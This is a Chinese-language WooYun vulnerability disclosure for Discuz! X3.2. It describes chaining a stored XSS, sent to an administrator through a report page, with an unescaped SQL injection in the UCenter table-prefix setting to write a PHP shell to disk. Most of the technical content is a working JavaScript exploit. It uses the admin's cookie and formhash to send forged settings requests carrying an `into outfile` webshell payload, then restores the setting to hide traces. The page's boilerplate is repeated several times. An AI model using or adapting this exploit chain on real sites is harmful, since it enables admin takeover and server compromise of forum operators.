Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076006

漏洞标题：Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

漏洞作者： menmen519

提交时间：2014-09-13 19:48

修复时间：2014-12-12 19:50

公开时间：2014-12-12 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-13：细节已通知厂商并且等待厂商处理中
2014-09-15：厂商已经确认，细节仅向厂商公开
2014-09-18：细节向第三方安全合作伙伴开放
2014-11-09：细节向核心白帽子及相关领域专家公开
2014-11-19：细节向普通白帽子公开
2014-11-29：细节向实习白帽子公开
2014-12-12：细节向公众公开

简要描述：

Discuz!x xss反弹后台无防御sql注入getshell，这里的xss只是做一个药引子，因为xss来自日志功能，然而这个日志功能却又默认关闭的，为了测试我们开启它。这个漏洞应该是所有dz通杀的，我下载了最新版本的所以测试通过......

详细说明：

首先我们开启日志功能，然后存储一个xss看看：
测试一个xss页面：

我们调到文章页面看看，是否被执行了：

下来我们看看怎样把这个发给管理员呢，底下有一个举报页面：

我们以管理员的身份看看这个后台的举报请求：

这个过程我们分析完毕了，下来我们看看后台一处，无防御的sql注入：

我们这里就不分析代码了，这里代码好曲折啊，大致思路我们给一张图，就可以看清楚
1.设置表前缀，抓包重放如下：

2.然后我们改一下表前缀的注入：

3.我们来监控一下，sql语句的执行过程，我们就明白了，这个漏洞产生的原因

a.当你第一次点击的时候，这个sql语句不会执行，然后你多提交几次，就可以了
b.数据第一次流进了这个表：

看以看出来，做了过滤
c.但是当数据取出来的时候，这个就没有在进行转义，直接从数据库获取，所以造成漏洞：

那么我们去这个目录看看是否生成了我们想要的shell:

这么一来所有的来龙去买我们都搞清楚了，那么怎么样把这两个组合起来，因为有表单hash的存在我们怎么通过xss搞定，思路如下：
1.我们通过ajax 首先对表单页面进行一次get访问，大家都知道dz会隐藏的形式写进表单的一个字段为formhash
2.有了这个formhash的话我们就可以，再次发送ajax请求，直接发送五次然后geshell
3.有人要问为什么要发送五次，这三次分别是什么
a.第一次是get请求获取formhash
b.第二，三次是发送构造的包，因为这第一次发送，是不会成功的，它要利用上次的发包，再二次构造，所以这里面发两次才能产生shell
c.第四,五次请求就是还原人家本来的面目，这里原理是相同的
接下来看我们的代码:
我们在远端的服务器放置的js内容如下：

function ajax(){
	var request = false;
	if(window.XMLHttpRequest) {
		request = new XMLHttpRequest();
	} else if(window.ActiveXObject) {
		var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
		for(var i=0; i<versions.length; i++) {
			try {
				request = new ActiveXObject(versions[i]);			 
			} catch(e) {}			  
		}			  
	}			  
	return request;			  
}
var formhash = '';
var cookie = document.cookie;
var _x = ajax();			  
request_get();
function request_get() {			  
	src="http://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/admin.php?action=misc&operation=custommenu";
	data="";
	xhr_act("GET",src,data);			  
}
function sleep(n){
			var start=new Date().getTime();
			while(true) if(new Date().getTime()-start>n) break;
}
function request_post(flag) {
	src="http://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/admin.php?action=setting&edit=yes";
	if(flag == 1){
	data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_vars union select \'<?php phpinfo()?>\' into outfile \'D:/APMSERVER/APMServ5.2.6/www/htdocs/Discuz_X3.2_SC_UTF8/upload/data/shell.php\'#\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\næäº¤\r\n-----------------------------2137124919446--';
	}else{
	data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\næäº¤\r\n-----------------------------2137124919446--';
	}
	
	xhr_act("POST",src,data);
}	
		  
function xhr_act(_m,_s,_a){
	if(_m == "GET"){
		_x.open(_m,_s,false);				
		_x.setRequestHeader("Cookie",cookie);			  
		_x.send();			  
		var document_str = _x.responseText;	
		var basestr = 'name="formhash" value="';
		var formhashpos = basestr.indexOf(basestr);
		var realpos = formhashpos + basestr.length;
		formhash = basestr.substr(realpos,8);
		if(formhash){
			var count_0 = 3;
			var count_1 = 3;
			for(var i=0;i<count_0;i++)
				request_post(1)
				
			sleep(1000);
			
			for(var j=0;j<count_1;i++)
				request_post(0)
		}
		
	}else{
		_x.open(_m,_s,false);				
		_x.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------2137124919446");
		_x.setRequestHeader("Cookie",cookie);
		_x.send(_a);			  
		return _x.responseText;			 
	}
}

然后依照刚才的解法，我们应该在那个目录下生成了一个shell.php

最后我们的站点还是可以正常访问，不留痕迹
到此为止所有的东西已经做完.............

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-09-15 10:39

厂商回复：

感谢您对我们产品的支持，我们会尽快处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076006

漏洞标题：Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

相关厂商：Discuz!

漏洞作者： menmen519

提交时间：2014-09-13 19:48

修复时间：2014-12-12 19:50

公开时间：2014-12-12 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076006

漏洞标题：Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

相关厂商：Discuz!

漏洞作者： menmen519

提交时间：2014-09-13 19:48

修复时间：2014-12-12 19:50

公开时间：2014-12-12 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076006"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：